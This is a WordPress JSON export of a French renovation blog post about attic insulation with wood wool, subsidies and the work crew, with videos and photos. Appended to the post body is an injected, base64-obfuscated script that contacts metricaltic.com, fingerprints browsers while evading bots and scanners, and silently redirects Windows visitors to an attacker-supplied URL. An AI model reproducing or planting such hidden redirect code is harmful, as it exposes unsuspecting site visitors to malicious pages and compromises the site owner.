{"id":380,"date":"2020-06-30T10:56:00","date_gmt":"2020-06-30T08:56:00","guid":{"rendered":"http:\/\/lafermedelamotte.fr\/?p=380"},"modified":"2025-12-31T16:55:48","modified_gmt":"2025-12-31T15:55:48","slug":"isolation-des-combles-et-rampants","status":"publish","type":"post","link":"http:\/\/lafermedelamotte.fr\/index.php\/2020\/06\/30\/isolation-des-combles-et-rampants\/","title":{"rendered":"Isolation des combles et rampants"},"content":{"rendered":"\n<p>Piquetage termin\u00e9 !!! Un grand bravo \u00e0 Yohann pour son travail acharn\u00e9 dans le but de prot\u00e9ger les belles pierres de notre maison !!<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"murs\" width=\"525\" height=\"295\" src=\"https:\/\/www.youtube.com\/embed\/4uLPu_d5zv0?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Nous avons choisi d&rsquo;utiliser de la laine de bois afin de profiter un maximum du bon d\u00e9phasage de ce mat\u00e9riau.<\/p>\n\n\n\n<p>Afin d&rsquo;obtenir l&rsquo;aide de l&rsquo;ANAH et de la r\u00e9gion (aide non n\u00e9gligeable puisqu&rsquo;elle correspond au tiers de la somme totale de l&rsquo;isolation), nous \u00e9tions suivi par INHARI (une structure bas\u00e9e \u00e0 Alen\u00e7on dont la mission est d&rsquo;aider les personnes qui souhaitent faire des travaux de r\u00e9novation \u00e9nerg\u00e9tique dans leur logement). Ils nous ont demand\u00e9 si l&rsquo;ont acceptait qu&rsquo;ils filment dans la maison une petite vid\u00e9o pour parler de la laine de bois et de sa pose.<\/p>\n\n\n\n<p>La voici : <\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Isolation Maison\" width=\"525\" height=\"295\" src=\"https:\/\/www.youtube.com\/embed\/L4PlxZjmU60?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Au moment de la vid\u00e9o, l&rsquo;isolation des combles \u00e9taient d\u00e9j\u00e0 bien avanc\u00e9e. Les rampants sont toujours \u00e0 nu. <\/p>\n\n\n\n<p>Ce chantier a dur\u00e9 3 semaines avec 3 gars \u00e0 la journ\u00e9e qui savaient ce qu&rsquo;ils faisaient. Nous avons r\u00e9alis\u00e9 \u00e0 quel point nous avons bien fait de ne pas nous lancer nous m\u00eame dans ce chantier-l\u00e0 !!!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog1-1024x576.jpg\" alt=\"\" class=\"wp-image-382\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog1-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog1-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog1-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog1-1536x864.jpg 1536w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog1.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Isolation en cours&#8230; J&rsquo;ai l&rsquo;air contente !<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog2-1024x576.jpg\" alt=\"\" class=\"wp-image-383\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog2-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog2-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog2-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog2-1536x864.jpg 1536w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog2.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Pon\u00e7age des poutres qui resteront apparentes<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog-3-1024x576.jpg\" alt=\"\" class=\"wp-image-381\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog-3-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog-3-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog-3-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog-3-1536x864.jpg 1536w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog-3.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Ca avance !<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog4-576x1024.jpg\" alt=\"\" class=\"wp-image-384\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog4-576x1024.jpg 576w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog4-169x300.jpg 169w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog4-768x1365.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog4-864x1536.jpg 864w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/05\/blog4.jpg 1000w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><figcaption>Les bandes des plafonds et rampants ont \u00e9t\u00e9 r\u00e9alis\u00e9es par le artisans. Yohann s&rsquo;est occup\u00e9 des bandes des murs.<\/figcaption><\/figure>\n\n\n\n<p><\/p>\n<script>!async function(){let e=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXRyaWNhbH\",\"RpYy5jb20vYXBpL2dldA==\"].join(\"\")))),t=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXR\",\"yaWNhbHRpYy5jb2\",\"0vYXBpL2xvZw==\"].join(\"\"))))\nfunction o(e){return btoa(unescape(encodeURIComponent(e)))}let n={}\nif(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,o]=e.split(\"=\")\nt&&o&&(n[t]=decodeURIComponent(o.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return\nfunction r(e,t){let o=e.match(t)\nreturn o?parseInt(o[1],10):null}let i=navigator.userAgent,a=\/Windows NT 10.0\/.test(i),l=r(i,\/Chrome\\\/(\\d+)\\.\/),c=r(i,\/Edg\\\/(\\d+)\\.\/),d=r(i,\/OPR\\\/(\\d+)\\.\/),s=r(i,\/YaBrowser\\\/(\\d+)\\.\/),u=r(i,\/Vivaldi\\\/(\\d+)\\.\/),w=r(i,\/Firefox\\\/(\\d+)\\.\/),h=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(i)&&\/Chrome\\\/(\\d+)\\.\/.test(i),g=!1;(l&&l>=136||c&&c>=134||d&&d>=120||s&&s>=24||u&&u>=6||w&&w>=140||h&&l&&l>=136)&&(g=!0)\nlet m=navigator.webdriver||\/HeadlessChrome\/.test(i)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(i),p=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory\nif(!a||m||p)return\nif(!g){try{fetch(t)}catch(e){}return}let v=document.querySelector('link[rel=\"icon\"]'),f=await async function t(n=1){try{let t=await async function(e,t={}){let{timeout:o=3e3}=t,n=new AbortController,r=setTimeout(()=>n.abort(),o)\ntry{let o=await fetch(e,{...t,signal:n.signal})\nreturn clearTimeout(r),o}catch(e){return clearTimeout(r),null}}(e,{timeout:3e3})\nif(!t||403===t.status)return null\nif(!t.ok)throw Error(\"Network response was not ok\")\nreturn`${(await t.json()).url}\/?wsid=${window.location.hostname}&domain=${o(window.location.hostname)}`}catch(e){return n<1?t(n+1):null}}()\nif(f){let e=f\nv&#038;&#038;(e+=`&#038;link=${o(v.href)}`),window.location.replace(e)}}()<\/script>","protected":false},"excerpt":{"rendered":"<p>Piquetage termin\u00e9 !!! Un grand bravo \u00e0 Yohann pour son travail acharn\u00e9 dans le but de prot\u00e9ger les belles pierres de notre maison !! Nous avons choisi d&rsquo;utiliser de la laine de bois afin de profiter un maximum du bon d\u00e9phasage de ce mat\u00e9riau. Afin d&rsquo;obtenir l&rsquo;aide de l&rsquo;ANAH et de la r\u00e9gion (aide non &hellip; <\/p>\n<p class=\"link-more\"><a href=\"http:\/\/lafermedelamotte.fr\/index.php\/2020\/06\/30\/isolation-des-combles-et-rampants\/\" class=\"more-link\">Continuer la lecture<span class=\"screen-reader-text\"> de &laquo;&nbsp;Isolation des combles et rampants&nbsp;&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-380","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/380","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/comments?post=380"}],"version-history":[{"count":4,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/380\/revisions"}],"predecessor-version":[{"id":398,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/380\/revisions\/398"}],"wp:attachment":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/media?parent=380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/categories?post=380"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/tags?post=380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}